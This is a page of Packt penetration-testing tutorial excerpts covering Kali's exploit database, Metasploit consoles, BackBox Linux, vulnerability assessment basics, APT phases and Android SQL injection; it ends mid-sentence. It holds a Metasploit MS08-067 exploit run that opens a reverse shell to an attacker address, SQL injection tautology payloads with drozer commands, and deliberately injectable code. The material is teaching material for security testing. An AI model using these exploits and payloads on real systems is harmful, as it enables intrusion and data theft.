
How-To Tutorials - Security

172 Articles

Target Exploitation

Packt
14 Mar 2014
14 min read
Vulnerability research

Understanding the capabilities of a specific software or hardware product provides a starting point for investigating the vulnerabilities that could exist in it. Conducting vulnerability research is not easy, nor is it a one-click task; it requires a strong knowledge base and several complementary skills to carry out the security analysis:

- Programming skills: This is a fundamental factor for ethical hackers. Learning the basic concepts and structures of any programming language gives the tester an important advantage in finding vulnerabilities. Beyond basic language knowledge, you must be prepared to deal with the advanced concepts of processors, system memory, buffers, pointers, data types, registers, and cache. These concepts apply in almost any programming language, such as C/C++, Python, Perl, and Assembly. To learn the basics of writing exploit code for a discovered vulnerability, visit http://www.phreedom.org/presentations/exploit-code-development/.
- Reverse engineering: This is another broad area for discovering vulnerabilities that may exist in an electronic device, software, or system by analyzing its functions, structures, and operations. The purpose is to deduce code from a given system without any prior knowledge of its internal workings, examine it for error conditions, poorly designed functions, and protocols, and test the boundary conditions. Several motivations inspire the practice of reverse engineering, such as the removal of copyright protection from software, security auditing, competitive technical intelligence, identification of patent infringement, interoperability, understanding the product workflow, and acquiring sensitive data. Reverse engineering adds two layers to examining an application's code: source code auditing and binary auditing. If you have access to the application's source code, you can accomplish the security analysis with automated tools or study the source manually to extract the conditions under which a vulnerability can be triggered. Binary auditing, on the other hand, covers the case where the application exists without any source code. Disassemblers and decompilers are the two generic types of tools that assist an auditor with binary analysis: disassemblers generate assembly code from a compiled binary program, while decompilers generate high-level language code from a compiled binary program. Dealing with either of these tools is challenging and requires careful assessment.
- Instrumented tools: Instrumented tools such as debuggers, data extractors, fuzzers, profilers, code coverage tools, flow analyzers, and memory monitors play an important role in the vulnerability discovery process and provide a consistent environment for testing. Explaining each of these tool categories is out of the scope of this book; however, you will find several useful tools already present in Kali Linux. To keep track of the latest reverse code engineering tools, we strongly recommend the online library at http://www.woodmann.com/collaborative/tools/index.php/Category:RCE_Tools.
Exploitability and payload construction: This is the final step in writing the proof-of-concept (PoC) code for a vulnerable element of an application, which could allow the penetration tester to execute custom commands on the target machine. We apply our knowledge of the vulnerable application from the reverse engineering stage to polish the shellcode with an encoding mechanism that avoids bad characters which might otherwise terminate the exploit process. Depending on the type and classification of the vulnerability discovered, it is very important to follow a specific strategy that allows you to execute arbitrary code or commands on the target system. As a professional penetration tester, you will always be looking for loopholes that result in shell access to your target operating system. Thus, we will demonstrate a few scenarios with the Metasploit framework that show these tools and techniques.

Vulnerability and exploit repositories

For many years, a number of vulnerabilities have been reported in the public domain. Some of these were disclosed with PoC exploit code to prove the feasibility and viability of the vulnerability found in the specific software or application, and many still remain unaddressed. This competitive era of finding publicly available exploits and vulnerability information makes it easier for penetration testers to quickly search for and retrieve the best available exploit that suits their target environment. You can also port one type of exploit to another (for example, from the Win32 architecture to the Linux architecture), provided that you hold intermediate programming skills and a clear understanding of the OS-specific architecture. We have provided a combined set of online repositories that may help you track down vulnerability information or exploits by searching through them.

Not every vulnerability found has been disclosed to the public on the Internet. Some are reported without any PoC exploit code, and some do not even provide detailed vulnerability information. For this reason, consulting more than one online resource is a proven practice among many security auditors. The following is a list of online repositories:

- Bugtraq SecurityFocus: http://www.securityfocus.com
- OSVDB Vulnerabilities: http://osvdb.org
- Packet Storm: http://www.packetstormsecurity.org
- VUPEN Security: http://www.vupen.com
- National Vulnerability Database: http://nvd.nist.gov
- ISS X-Force: http://xforce.iss.net
- US-CERT Vulnerability Notes: http://www.kb.cert.org/vuls
- US-CERT Alerts: http://www.us-cert.gov/cas/techalerts/
- SecuriTeam: http://www.securiteam.com
- Government Security Org: http://www.governmentsecurity.org
- Secunia Advisories: http://secunia.com/advisories/historic/
- Security Reason: http://securityreason.com
- XSSed XSS-Vulnerabilities: http://www.xssed.com
- Security Vulnerabilities Database: http://securityvulns.com
- SEBUG: http://www.sebug.net
- BugReport: http://www.bugreport.ir
- MediaService Lab: http://lab.mediaservice.net
- Intelligent Exploit Aggregation Network: http://www.intelligentexploit.com
- Hack0wn: http://www.hack0wn.com

Although many other Internet resources are available, we have listed only a few reviewed ones. Kali Linux comes with an integrated exploit database from Offensive Security, which provides the extra advantage of keeping an archive of exploits up to date on your system for future reference and use.
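Because the bundled archive is only useful if it is current, it is worth refreshing it periodically. The following is a minimal sketch, not the only way to do it: on Kali the archive ships as the exploitdb package and is updated through APT, and newer builds of the searchsploit wrapper also include a self-update switch (check searchsploit -h on your system before relying on it):

# apt-get update
# apt-get install exploitdb      # pulls the latest packaged copy of the archive
# searchsploit -u                # newer versions only: let the wrapper refresh the local copy itself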
To access Exploit-DB, execute the following commands in your shell:

# cd /usr/share/exploitdb/
# vim files.csv

This will open the complete list of exploits currently available from Exploit-DB; the exploit files themselves live under the /usr/share/exploitdb/platforms/ directory and are categorized into subdirectories based on the type of system (Windows, Linux, HP-UX, Novell, Solaris, BSD, IRIX, TRU64, ASP, PHP, and so on). Most of these exploits were developed using C, Perl, Python, Ruby, PHP, and other programming technologies. Kali Linux already comes with a handful of compilers and interpreters that support the execution of these exploits.

How to extract particular information from the exploits list? Using the power of bash commands, you can manipulate the output of any text file to retrieve meaningful data. You can either use searchsploit, or accomplish the same thing by typing the following on your console, which extracts the list of exploit titles from the files.csv file:

# cat files.csv | grep '"' | cut -d";" -f3

To learn the basic shell commands, please refer to http://tldp.org/LDP/abs/html/index.html.

Advanced exploitation toolkit

Kali Linux is preloaded with some of the best and most advanced exploitation toolkits. The Metasploit framework (http://www.metasploit.com) is one of these. We have explained it in greater detail and presented a number of scenarios that will effectively increase productivity and enhance your experience with penetration testing. The framework was developed in the Ruby programming language and supports modularization, which makes it easy for a penetration tester with moderate programming skills to extend it or develop custom plugins and tools. The architecture of the framework is divided into three broad categories: libraries, interfaces, and modules. A key part of our exercises is to focus on the capabilities of the various interfaces and modules. Interfaces (console, CLI, web, and GUI) provide the front-end operations for dealing with any type of module (exploits, payloads, auxiliaries, encoders, and NOPs). Each of the following module types has its own purpose in the penetration testing process:

- Exploit: This module is the proof-of-concept code developed to take advantage of a particular vulnerability in a target system.
- Payload: This module is malicious code intended as a part of an exploit, or compiled independently, to run arbitrary commands on the target system.
- Auxiliaries: These modules are sets of tools developed to perform scanning, sniffing, wardialing, fingerprinting, and other security assessment tasks.
- Encoders: These modules are provided to evade detection by antivirus, firewall, IDS/IPS, and other similar malware defenses by encoding the payload during a penetration operation.
- No Operation or No Operation Performed (NOP): This module is an assembly language instruction often added to a shellcode to do nothing except pad out a consistent payload space.

For your understanding, we have explained the basic use of two well-known Metasploit interfaces along with their relevant command-line options. Each interface has its own strengths and weaknesses; however, we strongly recommend that you stick to the console version, as it supports most of the framework features.

MSFConsole

MSFConsole is one of the most efficient, powerful, and all-in-one centralized front-end interfaces for penetration testers to make the best use of the exploitation framework.
To access msfconsole, navigate to Applications | Kali Linux | Exploitation Tools | Metasploit | Metasploit framework, or use the terminal to execute the following command:

# msfconsole

You will be dropped into an interactive console interface. To learn about all the available commands, you can type the following command:

msf > help

This will display two sets of commands: one set that is used widely across the framework, and another specific to the database backend where the assessment parameters and results are stored. Instructions about other usage options can be retrieved by appending -h to the core command. Let us examine the use of the show command:

msf > show -h
[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, plugins, options
[*] Additional module-specific parameters are: advanced, evasion, targets, actions

This command is typically used to display the available modules of a given type, or all of the modules. The most frequently used variants are the following:

- show auxiliary: This command will display all the auxiliary modules.
- show exploits: This command will get a list of all the exploits within the framework.
- show payloads: This command will retrieve a list of payloads for all platforms. However, using the same command in the context of a chosen exploit will display only compatible payloads; for instance, Windows payloads will only be displayed with Windows-compatible exploits.
- show encoders: This command will print the list of available encoders.
- show nops: This command will display all the available NOP generators.
- show options: This command will display the settings and options available for the specific module.
- show targets: This command will help us extract the list of target OS versions supported by a particular exploit module.
- show advanced: This command will provide you with more options to fine-tune your exploit execution.

We have compiled a short list of the most valuable commands in the following table; you can practice each one of them with the Metasploit console. The parameters shown alongside a command (such as param and value) need to be supplied by you:

- check: Verifies a particular exploit against your vulnerable target without exploiting it. This command is not supported by many exploits.
- connect ip port: Works similarly to the Netcat and Telnet tools.
- exploit: Launches a selected exploit.
- run: Launches a selected auxiliary module.
- jobs: Lists all the background modules currently running and provides the ability to terminate them.
- route add subnet netmask sessionid: Adds a route for traffic through a compromised session for network pivoting purposes.
- info module: Displays detailed information about a particular module (exploit, auxiliary, and so on).
- set param value: Configures the parameter value within the current module.
- setg param value: Sets the parameter value globally across the framework, to be used by all exploit and auxiliary modules.
- unset param: The reverse of the set command. You can also reset all variables at once by using the unset all command.
- unsetg param: Unsets one or more global variables.
- sessions: Displays, interacts with, and terminates target sessions. Use it with -l for listing, -i ID for interaction, and -k ID for termination.
- search string: Provides a search facility through module names and descriptions.
- use module: Selects a particular module in the context of penetration testing.
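To see how these commands fit together, here is a minimal example session; the module, payload, and addresses are illustrative lab values (the same ones reused in the MSFCLI example later), not values you should expect on your own network:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.3
LHOST => 192.168.0.3
msf exploit(ms08_067_netapi) > exploit

On success, the framework starts the reverse handler on LHOST and, if the target is vulnerable, opens a command shell session, just as the MSFCLI run shown next does.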
It is important for you to understand their basic use with the different sets of modules within the framework.

MSFCLI

Similar to the MSFConsole interface, the command-line interface (CLI) provides extensive coverage of the various modules that can be launched at any one instance. However, it lacks some of the advanced automation features of MSFConsole. To access msfcli, use the terminal to execute the following command:

# msfcli -h

This will display all the available modes, similar to those of MSFConsole, as well as usage instructions for selecting a particular module and setting its parameters. Note that all the variables or parameters should follow the param=value convention and that all options are case-sensitive. We have presented a small exercise to select and execute a particular exploit as follows:

# msfcli windows/smb/ms08_067_netapi O
[*] Please wait while we load the module tree...

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

The O at the end of the preceding command instructs the framework to display the available options for the selected exploit. The following command sets the target IP using the RHOST parameter and lists the compatible payloads with P:

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 P
[*] Please wait while we load the module tree...

Compatible payloads
===================

   Name                             Description
   ----                             -----------
   generic/debug_trap               Generate a debug trap in the target process
   generic/shell_bind_tcp           Listen for a connection and spawn a command shell
...

Finally, after setting the target IP using the RHOST parameter, it is time to select a compatible payload and execute our exploit as follows:

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.0.7 LHOST=192.168.0.3 PAYLOAD=windows/shell/reverse_tcp E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.0.3:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (240 bytes) to 192.168.0.7
[*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.7:1027)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

As you can see, we have acquired local shell access to our target machine after setting the LHOST parameter for the chosen payload.


Starting Out with BackBox Linux

Packt
17 Feb 2014
11 min read
(For more resources related to this topic, see here.) A flexible penetration testing distribution BackBox Linux is a very young project designed for penetration testing, vulnerability assessment and management. The key focus in using BackBox is to provide an independent security testing platform that can be easily customized with increased performance and stability. BackBox uses a very light desktop manager called XFCE. It includes the most popular security auditing tools that are essential for penetration testers and security advisers. The suite of tools includes web application analysis, network analysis, stress tests, computer sniffing forensic analysis, exploitation, documentation, and reporting. The BackBox repository is hosted on Launchpad and is constantly updated to the latest stable version of its tools. Adding and developing new tools inside the distribution requires it to be compliant with the open source community and particularly the Debian Free Software Guidelines criteria. IT security and penetration testing are dedicated sectors and quite new in the global market. There are a lot of Linux distributions dedicated to security; but if we do some research, we can see that only a couple of distributions are constantly updated. Many newly born projects stop at the first release without continuity and very few of them are updated. BackBox is one of the new players in this field and even though it is only a few years old, it has acquired an enormous user base and now holds the second place in worldwide rankings. It is a lightweight, community-built penetration testing distribution capable of running live in USB mode or as a permanent installation. BackBox now operates on release 3.09 as of September 2013, with a significant increase in users, thus becoming a stable community. BackBox is also significantly used in the professional world. BackBox is built on top of Ubuntu LTS and the 3.09 release uses 12.04 as its core. The desktop manager environment with XFCE and the ISO images are provided for 32-bit and 64-bit platforms (with the availability on Torrents and HTTP downloads from the project's website). The following screenshot shows the main view of the desktop manager, XFCE: The choice of desktop manager, XFCE, plays a very important role in BackBox. It is not only designed to serve the slender environment with medium and low level of resources, but also designed for very low memory. In case of very low memory and other resources (such as CPU, HD, and video), BackBox has an alternative way of booting the system without graphical user interface (GUI) and using command-line only, which requires really minimal amount of resources. With this aim in mind, BackBox is designed to function with pretty old and obsolete hardware to be used as a normal auditing platform. However, BackBox can be used on more powerful systems to perform actions that require the modern multicore processors to reduce ETA of the task such as brute-force attacks, data/password decryption, and password-cracking. Of course, the BackBox team aims to minimize overhead for the aforementioned cases through continuous research and development. Luckily, the majority of the tools included in BackBox can be performed in a shell/console environment and for the ones which require less resource. However, we always have our XFCE interface where we can access user-friendly GUI tools (in particular network analysis tools), which do not require many resources. 
A relative newcomer to the IT security and penetration testing environment, BackBox saw its first release on September 9, 2010, as a project of the Italian web community. Now on its third major release and close to the next minor release (BackBox Linux 3.13 is planned for the end of January 2014), BackBox has grown rapidly and offers a wide scope for both amateur and professional use.

The minimum requirements for BackBox are as follows:

- A 32-bit or 64-bit processor
- 512 MB of system memory (RAM); 256 MB if no desktop manager is used and only the console
- 4.4 GB of disk space for installation
- A graphics card capable of 800 x 600 resolution (less if no desktop manager is used)
- A DVD-ROM drive or USB port

The following screenshot shows the main view of BackBox with a toolbar at the bottom. The suite of auditing tools in BackBox makes the system complete and ready to use for security professionals and penetration testers.

The organization of tools in BackBox

The entire set of BackBox security tools is populated into a single menu called Audit and structured into different subtasks as follows:

- Information Gathering
- Vulnerability Assessment
- Exploitation
- Privilege Escalation
- Maintaining Access
- Documentation & Reporting
- Reverse Engineering
- Social Engineering
- Stress Testing
- Forensic Analysis
- VoIP Analysis
- Wireless Analysis
- Miscellaneous

We will run through the tools in BackBox by giving a short description of each section of the Auditing menu. The following screenshot shows the Auditing menu of BackBox.

Information Gathering: Information Gathering is the absolute first step for any security engineer and/or penetration tester. It is about collecting information on the target systems, which can be very useful in starting the assessment. Without this step, it would be quite difficult to assess any system.

Vulnerability Assessment: After you've gathered information by performing the first step, the next step is to analyze and evaluate that information. Vulnerability Assessment is the process of identifying the vulnerabilities present in the system and prioritizing them.

Exploitation: Exploitation is the process where a weakness or bug in the software is used to penetrate the system. This can be done through the use of an exploit, which is an automated script designed to perform a malicious attack on target systems.

Privilege Escalation: Privilege Escalation occurs when we have already gained access to the system, but with low privileges. It can also be that we have legitimate access, but not enough to make effective changes on the system, so we need to elevate our privileges or gain access to another account with higher privileges.

Maintaining Access: Maintaining Access is about setting up an environment that will allow us to access the system again without repeating the tasks that we performed to gain access initially.

Documentation & Reporting: The Documentation & Reporting menu contains the tools that allow us to collect information during our assessment and generate a human-readable report from it.

Reverse Engineering: The Reverse Engineering menu contains a suite of tools aimed at reversing a system by analyzing its structure, for both hardware and software.

Social Engineering: Social Engineering is based on a nontechnical intrusion method, relying mainly on human interaction. It is the ability to manipulate a person and obtain his/her access credentials, or information that can lead us to such credentials.
Stress Testing: The Stress Testing menu contains a group of tools aimed at testing applications and servers under stress. Stress testing is the action of sending a massive number of requests (for example, ICMP requests) against the target machine to create heavy traffic and overload the system. In this case, the target server is under severe stress and can be taken advantage of; for instance, running services such as the web server, database, or application server can be taken down (for example, by a DDoS attack).

Forensic Analysis: The Forensic Analysis menu contains a large number of useful tools for performing a forensic analysis of any system. Forensic analysis is the act of carrying out an investigation to obtain evidence from devices. It is a structured examination that aims to rebuild the user's history on a computer or a server system.

VoIP Analysis: Voice over IP (VoIP) is a very commonly used protocol today in every part of the world. VoIP analysis is the act of monitoring and analyzing network traffic with a specific focus on VoIP calls. In this section, we have a single tool dedicated to the analysis of VoIP systems.

Wireless Analysis: The Wireless Analysis menu contains a suite of tools dedicated to the security analysis of wireless protocols. Wireless analysis is the act of analyzing wireless devices to check their level of safety.

Miscellaneous: The Miscellaneous menu contains tools that have different functionalities and could be placed in any of the sections mentioned earlier, or in none of them.

Services: Apart from the Auditing menu, BackBox also has a Services menu. This menu is designed to hold the daemons of those tools that need to be manually initialized as a service.

Update: The Update menu can be found in the main menu, just next to the Services menu. It contains automated scripts that allow users to update the tools that fall outside the APT automated system.

Anonymous: BackBox 3.13 has a new menu entry called Anonymous in the main menu. It contains a script that makes the user invisible on the network once started. The script launches a set of tools that anonymize the system while browsing and connecting to the global network, the Internet.

Extras: Apart from the security-auditing tools, BackBox also has several privacy-protection tools. The suite of privacy-protection tools includes Tor, Polipo, and Firefox in safe mode, configured with a default profile in private-browsing mode. There are many other useful tools recommended by the team, but they are not included in the default ISO image; these recommended tools are available in the BackBox repository and can be easily installed with apt-get (the automated package installation tool for Debian-like systems).

Completeness, accuracy, and support

It is obvious that there are many alternatives when it comes to the choice of penetration testing tools for any particular auditing process. The BackBox team mainly focuses on the size of the tool library, performance, and the inclusion of the right tools for security and auditing. The set of tools included in BackBox is subject to careful selection and testing by the team. Many security and penetration testing tools are implemented to perform identical functions, and the BackBox team is very careful in the selection process in order to avoid duplicate applications and redundancies.
Besides the wiki-based documentation provided for its set of tools, the BackBox repository can also be imported into any existing Ubuntu installation (or any Debian-derivative distro) by simply adding the project's Launchpad repository to the source list. Another point the BackBox team focuses its attention on is size. BackBox may not offer the largest number of tools and utilities, but numbers do not equal quality: it has the essential tools installed by default, which are sufficient for a penetration tester. That said, BackBox is not a perfect penetration testing distribution; it is a very young project and aims to offer the best solution to the global community.

Links and contacts

BackBox is an open community where everybody's help is greatly welcomed. Here is a list of useful links to BackBox information on the Web:

- The BackBox main and official web page, with general information about the distribution and the organization of the team: http://www.BackBox.org/
- The BackBox official blog, with news about BackBox such as release notes and bug-fix notifications: http://www.BackBox.org/blog
- The BackBox official wiki, with many tutorials for the tools included in the distribution: http://wiki.BackBox.org/
- The BackBox official forum, the main discussion forum where users can post their problems and suggestions: http://forum.BackBox.org/
- The BackBox official IRC chat room: https://kiwiirc.com/client/irc.autistici.org:6667/?nick=BackBox_?#BackBox
- The BackBox official repository hosted on Launchpad, where all the packages are located: https://launchpad.net/~BackBox
- The BackBox Wikipedia page, with a brief history of how the project began: http://en.wikipedia.org/wiki/BackBox

Summary

In this article, we became more familiar with the BackBox environment by analyzing its menu structure and the way its tools are organized, and we provided a quick comment on each section. This is only the theoretical information introducing BackBox.

Resources for Article:

Further resources on this subject:
- Penetration Testing and Setup [article]
- BackTrack 4: Security with Penetration Testing Methodology [article]
- Web app penetration testing in Kali [article]


Fundamentals

Packt
20 Jan 2014
4 min read
Vulnerability Assessment and Penetration Testing

Vulnerability Assessment (VA) and Penetration Testing (PT or PenTest) are the most common types of technical security risk assessments or technical audits conducted using different tools. These tools provide the best outcomes when used optimally; an improper configuration may lead to multiple false positives that may or may not reflect true vulnerabilities. Vulnerability assessment tools are widely used by everyone, from small organizations to large enterprises, to assess their security status, which helps them make timely decisions to protect themselves from these vulnerabilities. Nessus is a widely recognized tool for performing both Vulnerability Assessments and PenTests. This section introduces you to the basic terminology relating to these two types of assessments.

A vulnerability, in terms of IT systems, can be defined as a potential weakness in a system or infrastructure that, if exploited, can result in the realization of an attack on the system. An example of a vulnerability is a weak, dictionary-word password in a system that can be exploited by a brute-force attack (a dictionary attack) attempting to guess the password. This may result in the password being compromised and an unauthorized person gaining access to the system.

Vulnerability Assessment is a phase-wise approach to identifying the vulnerabilities existing in an infrastructure. This can be done using automated scanning tools such as Nessus, which uses its set of plugins corresponding to different types of known security loopholes in infrastructure, or a manual, checklist-based approach that uses best practices and the vulnerabilities published on well-known vulnerability tracking sites. The manual approach is not as comprehensive as a tool-based approach and is more time-consuming: the kinds of checks performed by a vulnerability assessment tool can also be done manually, but this takes far longer than using an automated tool.

Penetration Testing adds a further step to vulnerability assessment: exploiting the vulnerabilities. Penetration Testing is an intrusive test in which the personnel doing the penetration test first perform a vulnerability assessment to identify the vulnerabilities and, as a next step, try to penetrate the system by exploiting the identified vulnerabilities.

Need for Vulnerability Assessment

It is very important for you to understand why Vulnerability Assessment or Penetration Testing is required. Though there are multiple direct or indirect benefits of conducting a vulnerability assessment or a PenTest, a few of them have been recorded here for your understanding.

Risk prevention: Vulnerability Assessment uncovers the loopholes, gaps, and vulnerabilities in the system. By running these scans on a periodic basis, an organization can identify known vulnerabilities in its IT infrastructure in time. Vulnerability Assessment also reduces the likelihood of noncompliance with the various compliance and regulatory requirements, since you already know your vulnerabilities. Awareness of such vulnerabilities in time can help an organization fix them and mitigate the risks involved before they get exploited.
The risks of getting a vulnerability exploited include:

- Financial loss due to vulnerability exploits
- Organization reputation
- Data theft
- Confidentiality compromise
- Integrity compromise
- Availability compromise

Compliance requirements: The well-known information security standards (for example, ISO 27001, PCI DSS, and PA DSS) have control requirements that mandate that a Vulnerability Assessment must be performed. A few countries have specific regulatory requirements for conducting Vulnerability Assessments in some specific industry sectors such as banking and telecom.

The life cycles of Vulnerability Assessment and Penetration Testing

This section describes the key phases in the life cycles of VA and PenTest. These life cycles are almost identical; Penetration Testing involves the additional step of exploiting the identified vulnerabilities. It is recommended that you perform testing based on the requirements and business objectives of testing in an organization, be it Vulnerability Assessment or Penetration Testing. The following stages are involved in this life cycle:

- Scoping
- Information gathering
- Vulnerability scanning
- False positive analysis
- Vulnerability exploitation (Penetration Testing)
- Report generation

The following figure illustrates the different sequential stages recommended to follow for a Vulnerability Assessment or Penetration Testing.

Summary

In this article, we covered an introduction to Vulnerability Assessment and Penetration Testing, along with an introduction to Nessus as a tool and steps on installing and setting up Nessus.

Resources for Article:

Further resources on this subject:
- CISSP: Vulnerability and Penetration Testing for Access Control [Article]
- Penetration Testing and Setup [Article]
- Web app penetration testing in Kali [Article]


Social Engineering Attacks

Packt
23 Dec 2013
6 min read
Advanced Persistent Threats

Advanced Persistent Threats (APTs) came into existence during cyber espionage between nations. The main motives for these attacks are monetary gain and lucrative information. APTs normally target a specific organization, and a targeted attack is the prerequisite for an APT. The targeted attack commonly exploits a vulnerability in an application on the target. The attacker typically crafts an e-mail with a malicious attachment, such as a PDF document or an executable, which is sent to an individual or a group of individuals. Generally, these e-mails include some social engineering element to make them attractive to the target. The typical characteristics of APTs are as follows:

- Reconnaissance: The attacker is motivated to get to know the target and their environment, specific users, system configurations, and so on. This type of information can be obtained from the metadata of documents published by the targeted organization, which can easily be collected from the organization's website by using tools such as FOCA, metagoofil, libextractor, and CeWL.
- Time-to-live: In APTs, attackers use techniques to bypass security and deploy a backdoor to retain access for a long period of time, so they can always come back in case their actual presence is detected.
- Advanced malware: The attacker uses polymorphic malware in the APT. Polymorphic malware generally changes throughout its life cycle to fool AV detection mechanisms.
- Phishing: Most APTs that exploit an application on the target machine start with social engineering and spear phishing. Once the target machine is compromised or network credentials are given up, the attackers actively take steps to deploy their own tools to monitor and spread through the network as required, machine to machine and network to network, until they find the information they are looking for.
- Active attack: In an APT there is a human element involved; not everything is automated malicious code.

Famous attacks classified as APTs include the following:

- Operation Aurora
- McRAT
- Hydraq
- Stuxnet
- RSA SecurID attacks

The APT life cycle covers five phases, which are as follows:

- Phase 1: Reconnaissance
- Phase 2: Initial exploitation
- Phase 3: Establish presence and control
- Phase 4: Privilege escalation
- Phase 5: Data extraction

Phase 1: Reconnaissance

There is a well-known saying that a war is half won not only on our own strength but on how well we know our enemy, and it applies to the defender as well. The attacker generally gathers information from a variety of sources as initial preparation: information on specific people (mostly higher management, who possess important information), information about specific events, the initial attack point to set up, and application vulnerabilities. There are multiple places, such as Facebook, LinkedIn, Google, and many more, where the attacker tries to find this information. Tools that generally assist here include the Social Engineering Framework (SEF), which we have covered in the book Kali Linux Social Engineering, and another one that I suggest is the FOCA metadata collector. An attack is then planned based on the information gathered. Employee awareness programs must therefore be run continuously to make employees aware that they should not highlight themselves on the Internet, and to be better prepared to defend against these attacks.
Phase 2: Initial exploitation

A spear-phishing attack is considered one of the most advanced targeted attacks, and such attacks are closely associated with advanced persistent threats. Today, many cyber criminals use spear phishing to perform the initial exploitation of a machine. The objective of spear phishing is to gain long-term access to different resources of the target, for example, government or military networks, or satellite usage. The main motivation for performing such attacks is to gain access to the IT environment and utilize zero-day exploits found during the initial information gathering phase. This attack is considered especially dangerous because the attacker can spoof the sender's e-mail ID when sending a malicious e-mail. A complete, graphical example of implementing this has been included in the book Kali Linux Social Engineering.

Phase 3: Establishing presence and control

The main objective of this stage is to deploy the full range of attack tools, such as backdoors and rootkits, to start controlling the environment and stay undetected. Organizations need to pay attention to outbound connections to deter such attacks, because the attack tools make outbound connections to the attacker.

Phase 4: Privilege escalation

This is one of the key phases in an APT. Once the attacker has breached the network, the next step is to take over privileged accounts in order to move around the targeted network. The common objective of the attacker is to obtain administrator-level credentials and stay undetected. The best approach to defend against these attacks is to assume that the attackers are inside our networks right now and proceed accordingly, blocking the pathways they would travel to access and steal our sensitive data.

Phase 5: Data extraction

This is the stage where the attacker has control over one or two machines in the targeted network, has obtained access credentials to extend their reach, and has identified the lucrative data. The only objective left for the attacker is to start sending the data from the targeted network to one of their own servers or machines. The attacker then has a number of options for what to do with this data: ask for a ransom and, if the target does not agree to pay, threaten to disclose the information publicly; share the zero-day exploits; sell the information; or disclose it publicly.

APT defense

The defense against APT attacks is mostly based on their characteristics. APT attacks normally bypass network firewall defenses by attaching exploits within content carried over an allowed protocol, so deep content filtering is required. Most APT attacks use custom-developed code or target zero-day vulnerabilities, so no single IPS or antivirus signature will be able to identify the threat, and you must rely on less definitive indicators. Organizations must ask themselves what they are trying to protect, and perhaps apply a layer of data loss prevention (DLP) technology. The organization needs to monitor both inbound and outbound traffic, preferably for both web and e-mail communication.

Summary

In this article, we learned what APTs are and about the different types of APT attacks.

Resources for Article:

Further resources on this subject:
- Web app penetration testing in Kali [Article]
- Debugging Sikuli scripts [Article]
- Customizing a Linux kernel [Article]


Knowing the SQL-injection attacks and securing our Android applications from them

Packt
20 Dec 2013
10 min read
Enumerating SQL-injection vulnerable content providers

Just like web applications, Android applications may use untrusted input to construct SQL queries, and may do so in a way that's exploitable. The most common case is when applications do not sanitize input for any SQL and do not limit access to their content providers.

Why would you want to stop a SQL-injection attack? Well, let's say you're in the classic situation of trying to authorize users by querying a database for the supplied username and password. The code would look similar to the following:

public boolean isValidUser(){
  u_username = EditText( some user value );
  u_password = EditText( some user value );
  //some un-important code here...
  String query = "select * from users_table where username = '" + u_username + "' and password = '" + u_password + "'";
  SQLiteDatabase db
  //some un-important code here...
  Cursor c = db.rawQuery( query, null );
  return c.getCount() != 0;
}

What's the problem with the previous code? Well, what happens when the user supplies a password of '' or '1'='1'? The query being passed to the database then looks like the following:

select * from users_table where username = '[user value]' and password = '' or '1'='1'

The final portion after password = is the part that was supplied by the user. This query forms what's known in Boolean algebra as a logical tautology: no matter what table or data the query is targeted at, the condition will always evaluate to true, which means that all the rows in the database will meet the selection criteria. This means that all the rows in users_table will be returned and, as a result, even if an invalid password such as ' or '1'=' is supplied, the c.getCount() call will always return a nonzero count, leading to an authentication bypass!

Given that not many Android developers would use the rawQuery call unless they need to pull off some really messy SQL queries, I've included another code snippet of a SQL-injection vulnerability that occurs more often in real-world applications. When auditing Android code for injection vulnerabilities, a good idea would be to look for something that resembles the following:

public Cursor query(Uri uri, String[] projection, String selection, String[] selectionArgs, String sortOrder) {
  SQLiteDBHelper sdbh = new StatementDBHelper(this.getContext());
  Cursor cursor;
  try {
    //some code has been omitted
    cursor = sdbh.query(projection, selection, selectionArgs, sortOrder);
  } finally {
    sdbh.close();
  }
  return cursor;
}

In the previous code, none of the projection, selection, selectionArgs, or sortOrder variables are sanitized; they come straight from external applications. If the content provider is exported and grants URI permissions or, as we've seen before, does not require any permissions, attackers will be able to inject arbitrary SQL and change the way the malicious query is evaluated.

Let's look at how you actually go about attacking SQL-injection vulnerable content providers using drozer.

How to do it...

In this recipe, I'll talk about two kinds of SQL-injection vulnerabilities: one where the select clause of a SQL statement is injectable, and one where the projection is injectable. Using drozer, it is pretty easy to find select-clause-injectable content providers:

dz> run app.provider.query [URI] --selection "1=1"

The previous command tries to inject what's called a logical tautology into the SQL statement being parsed by the content provider and, eventually, the database query parser.
Due to the nature of the module being used here, you can tell whether or not it actually worked, because it should return all the data from the database; that is, the select-clause criteria is applied to every row and because it will always return true, every row will be returned! You could also try any values that would always be true: dz> run app.provider.query [URI] –-selection "1-1=0" dz> run app.provider.query [URI] –-selection "0=0" dz> run app.provider.query [URI] –-selection "(1+random())*10 > 1" The following is an example of using a purposely vulnerable content provider: dz> run app.provider.query content://com.example. vulnerabledatabase.contentprovider/statements –-selection "1=1" It returns the entire table being queried, which is shown in the following screenshot: You can, of course, inject into the projection of the SELECT statement, that is, the part before FROM in the statement, that is, SELECT [projection] FROM [table] WHERE [select clause]. Securing application components Application components can be secured both by making proper use of the AndroidManifest.xml file and by forcing permission checks at code level. These two factors of application security make the permissions framework quite flexible and allow you to limit the number of applications accessing your components in quite a granular way. There are many measures that you can take to lock down access to your components, but what you should do before anything else is make sure you understand the purpose of your component, why you need to protect it, and what kind of risks your users face should a malicious application start firing off intents to your app and accessing its data. This is called a risk-based approach to security, and it is suggested that you first answer these questions honestly before configuring your AndroidManifest.xml file and adding permission checks to your apps. In this 